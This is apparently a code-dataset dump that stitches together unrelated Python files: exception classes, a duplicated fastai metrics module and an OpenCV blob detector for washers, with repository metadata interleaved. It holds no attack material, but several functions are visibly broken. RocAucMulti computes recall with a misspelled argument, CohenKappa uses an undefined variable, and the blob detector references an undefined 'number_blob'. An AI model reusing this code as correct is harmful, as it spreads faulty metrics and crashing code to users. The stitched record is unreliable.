return a code [{http_status_code}] with content [{server_response}]" class RefreshTokenExpiredError(Exception): def __init__(self, *args) -> None: super().__init__(*args)
from __future__ import absolute_import, annotations class AuthenticationException(ValueError): def __init__(self, interface: str, http_status_code: int, server_response: str) -> None: super().__init__(f"Not a valid authentication for the [{interface}] interface. Request has return a code [{http_status_code}] with content [{server_response}]") self.http_status_code = http_status_code self.server_response = server_response self.message = f"Not a valid authentication for the [{interface}] interface. Request has return a code [{http_status_code}] with content [{server_response}]" class NotFound(ValueError): def __init__(self, object_type: str, object_id: str, http_status_code: int, server_response: str) -> None: super().__init__(f"{object_type} with [{object_id}] does not exist. Request has return a code [{http_status_code}] with content [{server_response}]") self.http_status_code = http_status_code self.server_response = server_response self.message = f"{object_type} with [{object_id}] does not exist. Request has return a code [{http_status_code}] with content [{server_response}]" class CreationError(ValueError): def __init__(self, http_status_code: int, server_response: str) -> None: super().__init__(f"Request has return a code [{http_status_code}] with content [{server_response}]") self.http_status_code = http_status_code self.server_response = server_response self.message = f"Request has return a code [{http_status_code}] with content [{server_response}]" class RefreshTokenExpiredError(Exception): def __init__(self, *args) -> None: super().__init__(*args)
none
1
2.655267
3
dev/fastai2/metrics.py
anhquan0412/fastai_dev
380
6627932
<gh_stars>100-1000 #AUTOGENERATED! DO NOT EDIT! File to edit: dev/13a_metrics.ipynb (unless otherwise specified). __all__ = ['AccumMetric', 'skm_to_fastai', 'optim_metric', 'accuracy', 'error_rate', 'top_k_accuracy', 'APScore', 'BalancedAccuracy', 'BrierScore', 'CohenKappa', 'F1Score', 'FBeta', 'HammingLoss', 'Jaccard', 'MatthewsCorrCoef', 'Precision', 'Recall', 'RocAuc', 'Perplexity', 'perplexity', 'accuracy_multi', 'APScoreMulti', 'BrierScoreMulti', 'F1ScoreMulti', 'FBetaMulti', 'HammingLossMulti', 'JaccardMulti', 'MatthewsCorrCoefMulti', 'PrecisionMulti', 'RecallMulti', 'RocAucMulti', 'mse', 'rmse', 'mae', 'msle', 'exp_rmspe', 'ExplainedVariance', 'R2Score', 'foreground_acc', 'Dice', 'JaccardCoeff'] #Cell from .test import * from .data.all import * from .optimizer import * from .learner import * #Cell import sklearn.metrics as skm #Cell class AccumMetric(Metric): "Stores predictions and targets on CPU in accumulate to perform final calculations with `func`." def __init__(self, func, dim_argmax=None, sigmoid=False, thresh=None, to_np=False, invert_arg=False, flatten=True, **kwargs): store_attr(self,'func,dim_argmax,sigmoid,thresh,flatten') self.to_np,self.invert_args,self.kwargs = to_np,invert_arg,kwargs def reset(self): self.targs,self.preds = [],[] def accumulate(self, learn): pred = learn.pred.argmax(dim=self.dim_argmax) if self.dim_argmax else learn.pred if self.sigmoid: pred = torch.sigmoid(pred) if self.thresh: pred = (pred >= self.thresh) targ = learn.y pred,targ = to_detach(pred),to_detach(targ) if self.flatten: pred,targ = flatten_check(pred,targ) self.preds.append(pred) self.targs.append(targ) @property def value(self): if len(self.preds) == 0: return preds,targs = torch.cat(self.preds),torch.cat(self.targs) if self.to_np: preds,targs = preds.numpy(),targs.numpy() return self.func(targs, preds, **self.kwargs) if self.invert_args else self.func(preds, targs, **self.kwargs) @property def name(self): return self.func.func.__name__ if hasattr(self.func, 
'func') else self.func.__name__ #Cell def skm_to_fastai(func, is_class=True, thresh=None, axis=-1, sigmoid=None, **kwargs): "Convert `func` from sklearn.metrics to a fastai metric" dim_argmax = axis if is_class and thresh is None else None sigmoid = sigmoid if sigmoid is not None else (is_class and thresh is not None) return AccumMetric(func, dim_argmax=dim_argmax, sigmoid=sigmoid, thresh=thresh, to_np=True, invert_arg=True, **kwargs) #Cell def optim_metric(f, argname, bounds, tol=0.01, do_neg=True, get_x=False): "Replace metric `f` with a version that optimizes argument `argname`" def _f(preds, targs): def minfunc(x): kwargs = {argname:x} res = f(preds, targs, **kwargs) return -res if do_neg else res optres = scipy.optimize.minimize_scalar(minfunc, bounds=bounds, method='bounded', options={'xatol':0.01}) fun = -optres.fun if do_neg else optres.fun return (fun,optres.x) if get_x else fun _f.__name__ = f'opt_{f.__name__}' return _f #Cell def accuracy(inp, targ, axis=-1): "Compute accuracy with `targ` when `pred` is bs * n_classes" pred,targ = flatten_check(inp.argmax(dim=axis), targ) return (pred == targ).float().mean() #Cell def error_rate(inp, targ, axis=-1): "1 - `accuracy`" return 1 - accuracy(inp, targ, axis=axis) #Cell def top_k_accuracy(inp, targ, k=5, axis=-1): "Computes the Top-k accuracy (`targ` is in the top `k` predictions of `inp`)" inp = inp.topk(k=k, dim=axis)[1] targ = targ.unsqueeze(dim=axis).expand_as(inp) return (inp == targ).sum(dim=-1).float().mean() #Cell def APScore(axis=-1, average='macro', pos_label=1, sample_weight=None): "Average Precision for single-label classification problems" return skm_to_fastai(skm.average_precision_score, axis=axis, average=average, pos_label=pos_label, sample_weight=sample_weight) #Cell def BalancedAccuracy(axis=-1, sample_weight=None, adjusted=False): "Balanced Accuracy for single-label binary classification problems" return skm_to_fastai(skm.balanced_accuracy_score, axis=axis, sample_weight=sample_weight, 
adjusted=adjusted) #Cell def BrierScore(axis=-1, sample_weight=None, pos_label=None): "Brier score for single-label classification problems" return skm_to_fastai(skm.brier_score_loss, axis=axis, sample_weight=sample_weight, pos_label=pos_label) #Cell def CohenKappa(axis=-1, labels=None, weights=None, sample_weight=None): "Cohen kappa for single-label classification problems" return skm_to_fastai(skm.cohen_kappa_score, axis=axis, sample_weight=sample_weight, pos_label=pos_label) #Cell def F1Score(axis=-1, labels=None, pos_label=1, average='binary', sample_weight=None): "F1 score for single-label classification problems" return skm_to_fastai(skm.f1_score, axis=axis, labels=labels, pos_label=pos_label, average=average, sample_weight=sample_weight) #Cell def FBeta(beta, axis=-1, labels=None, pos_label=1, average='binary', sample_weight=None): "FBeta score with `beta` for single-label classification problems" return skm_to_fastai(skm.fbeta_score, axis=axis, beta=beta, labels=labels, pos_label=pos_label, average=average, sample_weight=sample_weight) #Cell def HammingLoss(axis=-1, labels=None, sample_weight=None): "Cohen kappa for single-label classification problems" return skm_to_fastai(skm.hamming_loss, axis=axis, labels=labels, sample_weight=sample_weight) #Cell def Jaccard(axis=-1, labels=None, pos_label=1, average='binary', sample_weight=None): "Jaccard score for single-label classification problems" return skm_to_fastai(skm.jaccard_similarity_score, axis=axis, labels=labels, pos_label=pos_label, average=average, sample_weight=sample_weight) #Cell def MatthewsCorrCoef(axis=-1, sample_weight=None): "Matthews correlation coefficient for single-label binary classification problems" return skm_to_fastai(skm.matthews_corrcoef, axis=axis, sample_weight=sample_weight) #Cell def Precision(axis=-1, labels=None, pos_label=1, average='binary', sample_weight=None): "Precision for single-label classification problems" return skm_to_fastai(skm.precision_score, axis=axis, 
labels=labels, pos_label=pos_label, average=average, sample_weight=sample_weight) #Cell def Recall(axis=-1, labels=None, pos_label=1, average='binary', sample_weight=None): "Recall for single-label classification problems" return skm_to_fastai(skm.recall_score, axis=axis, labels=labels, pos_label=pos_label, average=average, sample_weight=sample_weight) #Cell def RocAuc(axis=-1, average='macro', sample_weight=None, max_fpr=None): "Area Under the Receiver Operating Characteristic Curve for single-label binary classification problems" return skm_to_fastai(skm.roc_auc_score, axis=axis, average=average, sample_weight=sample_weight, max_fpr=max_fpr) #Cell class Perplexity(AvgLoss): "Perplexity (exponential of cross-entropy loss) for Language Models" @property def value(self): return torch.exp(self.total/self.count) if self.count != 0 else None @property def name(self): return "perplexity" perplexity = Perplexity() #Cell def accuracy_multi(inp, targ, thresh=0.5, sigmoid=True): "Compute accuracy when `inp` and `targ` are the same size." 
inp,targ = flatten_check(inp,targ) if sigmoid: inp = inp.sigmoid() return ((inp>thresh)==targ.bool()).float().mean() #Cell def APScoreMulti(thresh=0.5, sigmoid=True, average='macro', pos_label=1, sample_weight=None): "Average Precision for multi-label classification problems" return skm_to_fastai(skm.average_precision_score, thresh=thresh, sigmoid=sigmoid, flatten=False, average=average, pos_label=pos_label, sample_weight=sample_weight) #Cell def BrierScoreMulti(thresh=0.5, sigmoid=True, sample_weight=None, pos_label=None): "Brier score for multi-label classification problems" return skm_to_fastai(skm.brier_score_loss, thresh=thresh, sigmoid=sigmoid, flatten=False, sample_weight=sample_weight, pos_label=pos_label) #Cell def F1ScoreMulti(thresh=0.5, sigmoid=True, labels=None, pos_label=1, average='macro', sample_weight=None): "F1 score for multi-label classification problems" return skm_to_fastai(skm.f1_score, thresh=thresh, sigmoid=sigmoid, flatten=False, labels=labels, pos_label=pos_label, average=average, sample_weight=sample_weight) #Cell def FBetaMulti(beta, thresh=0.5, sigmoid=True, labels=None, pos_label=1, average='macro', sample_weight=None): "FBeta score with `beta` for multi-label classification problems" return skm_to_fastai(skm.fbeta_score, thresh=thresh, sigmoid=sigmoid, flatten=False, beta=beta, labels=labels, pos_label=pos_label, average=average, sample_weight=sample_weight) #Cell def HammingLossMulti(thresh=0.5, sigmoid=True, labels=None, sample_weight=None): "Cohen kappa for multi-label classification problems" return skm_to_fastai(skm.hamming_loss, thresh=thresh, sigmoid=sigmoid, flatten=False, labels=labels, sample_weight=sample_weight) #Cell def JaccardMulti(thresh=0.5, sigmoid=True, labels=None, pos_label=1, average='macro', sample_weight=None): "Jaccard score for multi-label classification problems" return skm_to_fastai(skm.jaccard_similarity_score, thresh=thresh, sigmoid=sigmoid, flatten=False, labels=labels, pos_label=pos_label, 
average=average, sample_weight=sample_weight) #Cell def MatthewsCorrCoefMulti(thresh=0.5, sigmoid=True, sample_weight=None): "Matthews correlation coefficient for multi-label classification problems" return skm_to_fastai(skm.matthews_corrcoef, thresh=thresh, sigmoid=sigmoid, flatten=False, sample_weight=sample_weight) #Cell def PrecisionMulti(thresh=0.5, sigmoid=True, labels=None, pos_label=1, average='macro', sample_weight=None): "Precision for multi-label classification problems" return skm_to_fastai(skm.precision_score, thresh=thresh, sigmoid=sigmoid, flatten=False, labels=labels, pos_label=pos_label, average=average, sample_weight=sample_weight) #Cell def RecallMulti(thresh=0.5, sigmoid=True, labels=None, pos_label=1, average='macro', sample_weight=None): "Recall for multi-label classification problems" return skm_to_fastai(skm.recall_score, thresh=thresh, sigmoid=sigmoid, flatten=False, labels=labels, pos_label=pos_label, average=average, sample_weight=sample_weight) #Cell def RocAucMulti(thresh=0.5, sigmoid=True, average='macro', sample_weight=None, max_fpr=None): "Area Under the Receiver Operating Characteristic Curve for multi-label binary classification problems" return skm_to_fastai(skm.recall_score, thresh=thresh, sigmoid=sigmoid, flatten=False, laverage=average, sample_weight=sample_weight, max_fpr=max_fpr) #Cell def mse(inp,targ): "Mean squared error between `inp` and `targ`." return F.mse_loss(*flatten_check(inp,targ)) #Cell def _rmse(inp, targ): return torch.sqrt(F.mse_loss(inp, targ)) rmse = AccumMetric(_rmse) rmse.__doc__ = "Root mean squared error" #Cell def mae(inp,targ): "Mean absolute error between `inp` and `targ`." inp,targ = flatten_check(inp,targ) return torch.abs(inp - targ).mean() #Cell def msle(inp, targ): "Mean squared logarithmic error between `inp` and `targ`." 
inp,targ = flatten_check(inp,targ) return F.mse_loss(torch.log(1 + inp), torch.log(1 + targ)) #Cell def _exp_rmspe(inp,targ): inp,targ = torch.exp(inp),torch.exp(targ) return torch.sqrt(((targ - inp)/targ).pow(2).mean()) exp_rmspe = AccumMetric(_exp_rmspe) exp_rmspe.__doc__ = "Root mean square percentage error of the exponential of predictions and targets" #Cell def ExplainedVariance(sample_weight=None): "Explained variance betzeen predictions and targets" return skm_to_fastai(skm.explained_variance_score, is_class=False, sample_weight=sample_weight) #Cell def R2Score(sample_weight=None): "R2 score betzeen predictions and targets" return skm_to_fastai(skm.r2_score, is_class=False, sample_weight=sample_weight) #Cell def foreground_acc(inp, targ, bkg_idx=0, axis=1): "Computes non-background accuracy for multiclass segmentation" targ = targ.squeeze(1) mask = targ != bkg_idx return (inp.argmax(dim=axis)[mask]==targ[mask]).float().mean() #Cell class Dice(Metric): "Dice coefficient metric for binary target in segmentation" def __init__(self, axis=1): self.axis = axis def reset(self): self.inter,self.union = 0,0 def accumulate(self, learn): pred,targ = flatten_check(learn.pred.argmax(dim=self.axis), learn.y) self.inter += (pred*targ).float().sum().item() self.union += (pred+targ).float().sum().item() @property def value(self): return 2. * self.inter/self.union if self.union > 0 else None #Cell class JaccardCoeff(Dice): "Implemetation of the jaccard coefficient that is lighter in RAM" @property def value(self): return self.inter/(self.union-self.inter) if self.union > 0 else None
#AUTOGENERATED! DO NOT EDIT! File to edit: dev/13a_metrics.ipynb (unless otherwise specified). __all__ = ['AccumMetric', 'skm_to_fastai', 'optim_metric', 'accuracy', 'error_rate', 'top_k_accuracy', 'APScore', 'BalancedAccuracy', 'BrierScore', 'CohenKappa', 'F1Score', 'FBeta', 'HammingLoss', 'Jaccard', 'MatthewsCorrCoef', 'Precision', 'Recall', 'RocAuc', 'Perplexity', 'perplexity', 'accuracy_multi', 'APScoreMulti', 'BrierScoreMulti', 'F1ScoreMulti', 'FBetaMulti', 'HammingLossMulti', 'JaccardMulti', 'MatthewsCorrCoefMulti', 'PrecisionMulti', 'RecallMulti', 'RocAucMulti', 'mse', 'rmse', 'mae', 'msle', 'exp_rmspe', 'ExplainedVariance', 'R2Score', 'foreground_acc', 'Dice', 'JaccardCoeff'] #Cell from .test import * from .data.all import * from .optimizer import * from .learner import * #Cell import sklearn.metrics as skm #Cell class AccumMetric(Metric): "Stores predictions and targets on CPU in accumulate to perform final calculations with `func`." def __init__(self, func, dim_argmax=None, sigmoid=False, thresh=None, to_np=False, invert_arg=False, flatten=True, **kwargs): store_attr(self,'func,dim_argmax,sigmoid,thresh,flatten') self.to_np,self.invert_args,self.kwargs = to_np,invert_arg,kwargs def reset(self): self.targs,self.preds = [],[] def accumulate(self, learn): pred = learn.pred.argmax(dim=self.dim_argmax) if self.dim_argmax else learn.pred if self.sigmoid: pred = torch.sigmoid(pred) if self.thresh: pred = (pred >= self.thresh) targ = learn.y pred,targ = to_detach(pred),to_detach(targ) if self.flatten: pred,targ = flatten_check(pred,targ) self.preds.append(pred) self.targs.append(targ) @property def value(self): if len(self.preds) == 0: return preds,targs = torch.cat(self.preds),torch.cat(self.targs) if self.to_np: preds,targs = preds.numpy(),targs.numpy() return self.func(targs, preds, **self.kwargs) if self.invert_args else self.func(preds, targs, **self.kwargs) @property def name(self): return self.func.func.__name__ if hasattr(self.func, 'func') else 
self.func.__name__ #Cell def skm_to_fastai(func, is_class=True, thresh=None, axis=-1, sigmoid=None, **kwargs): "Convert `func` from sklearn.metrics to a fastai metric" dim_argmax = axis if is_class and thresh is None else None sigmoid = sigmoid if sigmoid is not None else (is_class and thresh is not None) return AccumMetric(func, dim_argmax=dim_argmax, sigmoid=sigmoid, thresh=thresh, to_np=True, invert_arg=True, **kwargs) #Cell def optim_metric(f, argname, bounds, tol=0.01, do_neg=True, get_x=False): "Replace metric `f` with a version that optimizes argument `argname`" def _f(preds, targs): def minfunc(x): kwargs = {argname:x} res = f(preds, targs, **kwargs) return -res if do_neg else res optres = scipy.optimize.minimize_scalar(minfunc, bounds=bounds, method='bounded', options={'xatol':0.01}) fun = -optres.fun if do_neg else optres.fun return (fun,optres.x) if get_x else fun _f.__name__ = f'opt_{f.__name__}' return _f #Cell def accuracy(inp, targ, axis=-1): "Compute accuracy with `targ` when `pred` is bs * n_classes" pred,targ = flatten_check(inp.argmax(dim=axis), targ) return (pred == targ).float().mean() #Cell def error_rate(inp, targ, axis=-1): "1 - `accuracy`" return 1 - accuracy(inp, targ, axis=axis) #Cell def top_k_accuracy(inp, targ, k=5, axis=-1): "Computes the Top-k accuracy (`targ` is in the top `k` predictions of `inp`)" inp = inp.topk(k=k, dim=axis)[1] targ = targ.unsqueeze(dim=axis).expand_as(inp) return (inp == targ).sum(dim=-1).float().mean() #Cell def APScore(axis=-1, average='macro', pos_label=1, sample_weight=None): "Average Precision for single-label classification problems" return skm_to_fastai(skm.average_precision_score, axis=axis, average=average, pos_label=pos_label, sample_weight=sample_weight) #Cell def BalancedAccuracy(axis=-1, sample_weight=None, adjusted=False): "Balanced Accuracy for single-label binary classification problems" return skm_to_fastai(skm.balanced_accuracy_score, axis=axis, sample_weight=sample_weight, adjusted=adjusted) 
#Cell def BrierScore(axis=-1, sample_weight=None, pos_label=None): "Brier score for single-label classification problems" return skm_to_fastai(skm.brier_score_loss, axis=axis, sample_weight=sample_weight, pos_label=pos_label) #Cell def CohenKappa(axis=-1, labels=None, weights=None, sample_weight=None): "Cohen kappa for single-label classification problems" return skm_to_fastai(skm.cohen_kappa_score, axis=axis, sample_weight=sample_weight, pos_label=pos_label) #Cell def F1Score(axis=-1, labels=None, pos_label=1, average='binary', sample_weight=None): "F1 score for single-label classification problems" return skm_to_fastai(skm.f1_score, axis=axis, labels=labels, pos_label=pos_label, average=average, sample_weight=sample_weight) #Cell def FBeta(beta, axis=-1, labels=None, pos_label=1, average='binary', sample_weight=None): "FBeta score with `beta` for single-label classification problems" return skm_to_fastai(skm.fbeta_score, axis=axis, beta=beta, labels=labels, pos_label=pos_label, average=average, sample_weight=sample_weight) #Cell def HammingLoss(axis=-1, labels=None, sample_weight=None): "Cohen kappa for single-label classification problems" return skm_to_fastai(skm.hamming_loss, axis=axis, labels=labels, sample_weight=sample_weight) #Cell def Jaccard(axis=-1, labels=None, pos_label=1, average='binary', sample_weight=None): "Jaccard score for single-label classification problems" return skm_to_fastai(skm.jaccard_similarity_score, axis=axis, labels=labels, pos_label=pos_label, average=average, sample_weight=sample_weight) #Cell def MatthewsCorrCoef(axis=-1, sample_weight=None): "Matthews correlation coefficient for single-label binary classification problems" return skm_to_fastai(skm.matthews_corrcoef, axis=axis, sample_weight=sample_weight) #Cell def Precision(axis=-1, labels=None, pos_label=1, average='binary', sample_weight=None): "Precision for single-label classification problems" return skm_to_fastai(skm.precision_score, axis=axis, labels=labels, 
pos_label=pos_label, average=average, sample_weight=sample_weight) #Cell def Recall(axis=-1, labels=None, pos_label=1, average='binary', sample_weight=None): "Recall for single-label classification problems" return skm_to_fastai(skm.recall_score, axis=axis, labels=labels, pos_label=pos_label, average=average, sample_weight=sample_weight) #Cell def RocAuc(axis=-1, average='macro', sample_weight=None, max_fpr=None): "Area Under the Receiver Operating Characteristic Curve for single-label binary classification problems" return skm_to_fastai(skm.roc_auc_score, axis=axis, average=average, sample_weight=sample_weight, max_fpr=max_fpr) #Cell class Perplexity(AvgLoss): "Perplexity (exponential of cross-entropy loss) for Language Models" @property def value(self): return torch.exp(self.total/self.count) if self.count != 0 else None @property def name(self): return "perplexity" perplexity = Perplexity() #Cell def accuracy_multi(inp, targ, thresh=0.5, sigmoid=True): "Compute accuracy when `inp` and `targ` are the same size." 
inp,targ = flatten_check(inp,targ) if sigmoid: inp = inp.sigmoid() return ((inp>thresh)==targ.bool()).float().mean() #Cell def APScoreMulti(thresh=0.5, sigmoid=True, average='macro', pos_label=1, sample_weight=None): "Average Precision for multi-label classification problems" return skm_to_fastai(skm.average_precision_score, thresh=thresh, sigmoid=sigmoid, flatten=False, average=average, pos_label=pos_label, sample_weight=sample_weight) #Cell def BrierScoreMulti(thresh=0.5, sigmoid=True, sample_weight=None, pos_label=None): "Brier score for multi-label classification problems" return skm_to_fastai(skm.brier_score_loss, thresh=thresh, sigmoid=sigmoid, flatten=False, sample_weight=sample_weight, pos_label=pos_label) #Cell def F1ScoreMulti(thresh=0.5, sigmoid=True, labels=None, pos_label=1, average='macro', sample_weight=None): "F1 score for multi-label classification problems" return skm_to_fastai(skm.f1_score, thresh=thresh, sigmoid=sigmoid, flatten=False, labels=labels, pos_label=pos_label, average=average, sample_weight=sample_weight) #Cell def FBetaMulti(beta, thresh=0.5, sigmoid=True, labels=None, pos_label=1, average='macro', sample_weight=None): "FBeta score with `beta` for multi-label classification problems" return skm_to_fastai(skm.fbeta_score, thresh=thresh, sigmoid=sigmoid, flatten=False, beta=beta, labels=labels, pos_label=pos_label, average=average, sample_weight=sample_weight) #Cell def HammingLossMulti(thresh=0.5, sigmoid=True, labels=None, sample_weight=None): "Cohen kappa for multi-label classification problems" return skm_to_fastai(skm.hamming_loss, thresh=thresh, sigmoid=sigmoid, flatten=False, labels=labels, sample_weight=sample_weight) #Cell def JaccardMulti(thresh=0.5, sigmoid=True, labels=None, pos_label=1, average='macro', sample_weight=None): "Jaccard score for multi-label classification problems" return skm_to_fastai(skm.jaccard_similarity_score, thresh=thresh, sigmoid=sigmoid, flatten=False, labels=labels, pos_label=pos_label, 
average=average, sample_weight=sample_weight) #Cell def MatthewsCorrCoefMulti(thresh=0.5, sigmoid=True, sample_weight=None): "Matthews correlation coefficient for multi-label classification problems" return skm_to_fastai(skm.matthews_corrcoef, thresh=thresh, sigmoid=sigmoid, flatten=False, sample_weight=sample_weight) #Cell def PrecisionMulti(thresh=0.5, sigmoid=True, labels=None, pos_label=1, average='macro', sample_weight=None): "Precision for multi-label classification problems" return skm_to_fastai(skm.precision_score, thresh=thresh, sigmoid=sigmoid, flatten=False, labels=labels, pos_label=pos_label, average=average, sample_weight=sample_weight) #Cell def RecallMulti(thresh=0.5, sigmoid=True, labels=None, pos_label=1, average='macro', sample_weight=None): "Recall for multi-label classification problems" return skm_to_fastai(skm.recall_score, thresh=thresh, sigmoid=sigmoid, flatten=False, labels=labels, pos_label=pos_label, average=average, sample_weight=sample_weight) #Cell def RocAucMulti(thresh=0.5, sigmoid=True, average='macro', sample_weight=None, max_fpr=None): "Area Under the Receiver Operating Characteristic Curve for multi-label binary classification problems" return skm_to_fastai(skm.recall_score, thresh=thresh, sigmoid=sigmoid, flatten=False, laverage=average, sample_weight=sample_weight, max_fpr=max_fpr) #Cell def mse(inp,targ): "Mean squared error between `inp` and `targ`." return F.mse_loss(*flatten_check(inp,targ)) #Cell def _rmse(inp, targ): return torch.sqrt(F.mse_loss(inp, targ)) rmse = AccumMetric(_rmse) rmse.__doc__ = "Root mean squared error" #Cell def mae(inp,targ): "Mean absolute error between `inp` and `targ`." inp,targ = flatten_check(inp,targ) return torch.abs(inp - targ).mean() #Cell def msle(inp, targ): "Mean squared logarithmic error between `inp` and `targ`." 
inp,targ = flatten_check(inp,targ) return F.mse_loss(torch.log(1 + inp), torch.log(1 + targ)) #Cell def _exp_rmspe(inp,targ): inp,targ = torch.exp(inp),torch.exp(targ) return torch.sqrt(((targ - inp)/targ).pow(2).mean()) exp_rmspe = AccumMetric(_exp_rmspe) exp_rmspe.__doc__ = "Root mean square percentage error of the exponential of predictions and targets" #Cell def ExplainedVariance(sample_weight=None): "Explained variance betzeen predictions and targets" return skm_to_fastai(skm.explained_variance_score, is_class=False, sample_weight=sample_weight) #Cell def R2Score(sample_weight=None): "R2 score betzeen predictions and targets" return skm_to_fastai(skm.r2_score, is_class=False, sample_weight=sample_weight) #Cell def foreground_acc(inp, targ, bkg_idx=0, axis=1): "Computes non-background accuracy for multiclass segmentation" targ = targ.squeeze(1) mask = targ != bkg_idx return (inp.argmax(dim=axis)[mask]==targ[mask]).float().mean() #Cell class Dice(Metric): "Dice coefficient metric for binary target in segmentation" def __init__(self, axis=1): self.axis = axis def reset(self): self.inter,self.union = 0,0 def accumulate(self, learn): pred,targ = flatten_check(learn.pred.argmax(dim=self.axis), learn.y) self.inter += (pred*targ).float().sum().item() self.union += (pred+targ).float().sum().item() @property def value(self): return 2. * self.inter/self.union if self.union > 0 else None #Cell class JaccardCoeff(Dice): "Implemetation of the jaccard coefficient that is lighter in RAM" @property def value(self): return self.inter/(self.union-self.inter) if self.union > 0 else None
en
0.564004
#AUTOGENERATED! DO NOT EDIT! File to edit: dev/13a_metrics.ipynb (unless otherwise specified). #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell #Cell
1.629042
2
subpartcode/Camera Vision/objcenter.py
LesterYHZ/Automated-Bridge-Inspection-Robot-Project
1
6627933
# goal of this code is to use OpenCV's Blob detector to detector the washers using an # OpenCV's Canny edge detection filter (not color) # it needs the video frame as an input # outputs the x and y coordinate to the closest blob detected # the blob parameters are needed to limit the things that are detected as a "blob" # in our case we only want the washers to be detected as blobs # import necessary packages import imutils import numpy as np import cv2 global washer_detected class ObjCenter: def __init__(self, blob_canny): # The constructor # load OpenCV's blob detector # setting parameters for detector to detect certain blobs only params = cv2.SimpleBlobDetector_Params() # Change thresholds params.minThreshold = 100 params.maxThreshold = 300 # Filter by Area params.filterByArea = True params.minArea = 10 # params.maxArea = 5000 # Filter by Circularity params.filterByCircularity = True params.minCircularity = 0.1 # params.maxCircularity = 1 # Filter by Convexity params.filterByConvexity = 1 params.minConvexity = 0.2 params.maxConvexity = 1 # Filter by Inertia params.filterByInertia = 1 params.minInertiaRatio = 0.01 # params.maxInertiaRatio = 1 # Create a detector with the specified parameters # blob detector detects blobs from video frame ver = (cv2.__version__).split('.') if int(ver[0]) < 3: self.detector = cv2.SimpleBlobDetector(params) else: self.detector = cv2.SimpleBlobDetector_create(params) def update(self, frame, frameCenter): # convert the frame to grayscale, blur image and extract edges # uses edges to determine a blob (AKA washer) gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) blur = cv2.GaussianBlur(gray, (5, 5), 0) canny = cv2.Canny(blur, 10, 50) # detect all blobs in the input frame rects = self.detector.detect(canny) # check to see if a blob was found if len(rects) > 0: # blob is detected # extract x and y coordinates from detected blobs # blob coordinates give the center of blob detected # blobs are numbered from the closet y (base of camera) to the 
furthers (away from the camera) washer_detected = (len(rects)) print('number of washers', number_blob) # print out number of blobs pts_array = cv2.KeyPoint_convert(rects) # creates an array of the x and y coordinates for center of blobs pts = np.array(pts_array) # converts to an array we can pull from x = pts[0, 0] # closest blob detected x point y = pts[0, 1] # closest blob detected y point blobX = int(x) blobY = int(y) # return the center (x, y)-coordinates of the first/closet blob return ((blobX, blobY), pts[0], number_blob) # otherwise no blobs were found, so return the center of the # frame + 90 and - 90 if len(rects) == 0: while len(rects) == 0: blobX = np.arange(0, (frameCenter + frameCenter/2), 10) blobY = np.arange(0, (frameCenter + frameCenter/2), 10) return ((blobX, blobY)) # return (frameCenter, None)
# goal of this code is to use OpenCV's Blob detector to detector the washers using an # OpenCV's Canny edge detection filter (not color) # it needs the video frame as an input # outputs the x and y coordinate to the closest blob detected # the blob parameters are needed to limit the things that are detected as a "blob" # in our case we only want the washers to be detected as blobs # import necessary packages import imutils import numpy as np import cv2 global washer_detected class ObjCenter: def __init__(self, blob_canny): # The constructor # load OpenCV's blob detector # setting parameters for detector to detect certain blobs only params = cv2.SimpleBlobDetector_Params() # Change thresholds params.minThreshold = 100 params.maxThreshold = 300 # Filter by Area params.filterByArea = True params.minArea = 10 # params.maxArea = 5000 # Filter by Circularity params.filterByCircularity = True params.minCircularity = 0.1 # params.maxCircularity = 1 # Filter by Convexity params.filterByConvexity = 1 params.minConvexity = 0.2 params.maxConvexity = 1 # Filter by Inertia params.filterByInertia = 1 params.minInertiaRatio = 0.01 # params.maxInertiaRatio = 1 # Create a detector with the specified parameters # blob detector detects blobs from video frame ver = (cv2.__version__).split('.') if int(ver[0]) < 3: self.detector = cv2.SimpleBlobDetector(params) else: self.detector = cv2.SimpleBlobDetector_create(params) def update(self, frame, frameCenter): # convert the frame to grayscale, blur image and extract edges # uses edges to determine a blob (AKA washer) gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) blur = cv2.GaussianBlur(gray, (5, 5), 0) canny = cv2.Canny(blur, 10, 50) # detect all blobs in the input frame rects = self.detector.detect(canny) # check to see if a blob was found if len(rects) > 0: # blob is detected # extract x and y coordinates from detected blobs # blob coordinates give the center of blob detected # blobs are numbered from the closet y (base of camera) to the 
furthers (away from the camera) washer_detected = (len(rects)) print('number of washers', number_blob) # print out number of blobs pts_array = cv2.KeyPoint_convert(rects) # creates an array of the x and y coordinates for center of blobs pts = np.array(pts_array) # converts to an array we can pull from x = pts[0, 0] # closest blob detected x point y = pts[0, 1] # closest blob detected y point blobX = int(x) blobY = int(y) # return the center (x, y)-coordinates of the first/closet blob return ((blobX, blobY), pts[0], number_blob) # otherwise no blobs were found, so return the center of the # frame + 90 and - 90 if len(rects) == 0: while len(rects) == 0: blobX = np.arange(0, (frameCenter + frameCenter/2), 10) blobY = np.arange(0, (frameCenter + frameCenter/2), 10) return ((blobX, blobY)) # return (frameCenter, None)
en
0.762008
# goal of this code is to use OpenCV's Blob detector to detector the washers using an # OpenCV's Canny edge detection filter (not color) # it needs the video frame as an input # outputs the x and y coordinate to the closest blob detected # the blob parameters are needed to limit the things that are detected as a "blob" # in our case we only want the washers to be detected as blobs # import necessary packages # The constructor # load OpenCV's blob detector # setting parameters for detector to detect certain blobs only # Change thresholds # Filter by Area # params.maxArea = 5000 # Filter by Circularity # params.maxCircularity = 1 # Filter by Convexity # Filter by Inertia # params.maxInertiaRatio = 1 # Create a detector with the specified parameters # blob detector detects blobs from video frame # convert the frame to grayscale, blur image and extract edges # uses edges to determine a blob (AKA washer) # detect all blobs in the input frame # check to see if a blob was found # blob is detected # extract x and y coordinates from detected blobs # blob coordinates give the center of blob detected # blobs are numbered from the closet y (base of camera) to the furthers (away from the camera) # print out number of blobs # creates an array of the x and y coordinates for center of blobs # converts to an array we can pull from # closest blob detected x point # closest blob detected y point # return the center (x, y)-coordinates of the first/closet blob # otherwise no blobs were found, so return the center of the # frame + 90 and - 90 # return (frameCenter, None)
3.453279
3
bot/exts/__init__.py
sam-heller/sir-lancebot
1
6627934
